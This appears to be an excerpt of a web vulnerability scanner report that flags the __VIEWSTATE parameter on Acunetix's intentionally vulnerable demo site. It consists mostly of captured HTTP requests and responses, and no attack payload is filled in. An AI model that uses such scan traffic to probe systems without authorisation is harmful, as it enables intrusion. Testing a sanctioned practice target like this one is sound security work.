27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:White" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8576&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBAhB4PddsIZGRkf3l0lWNmFvmLScPaCNZ%2B%2FZ4FnpU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL98N65DQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHClM%2F9oKDeRXlzL1QJ4YeVHzgAwfj
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:18 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBAhB4PddsIZGRkf3l0lWNmFvmLScPaCNZ+/Z4FnpU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL98N65DQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHClM/9oKDeRXlzL1QJ4YeVHzgAwfj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:White" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8580&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBAK8gzeNsIZGRk1aMlp8cuOvmHKkTZGD7EOmApYno%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL2toOJCAKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsvt2Zt58ns4X6toRZy61P2JeVPi
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:13 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBAK8gzeNsIZGRk1aMlp8cuOvmHKkTZGD7EOmApYno=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL2toOJCAKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsvt2Zt58ns4X6toRZy61P2JeVPi" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" 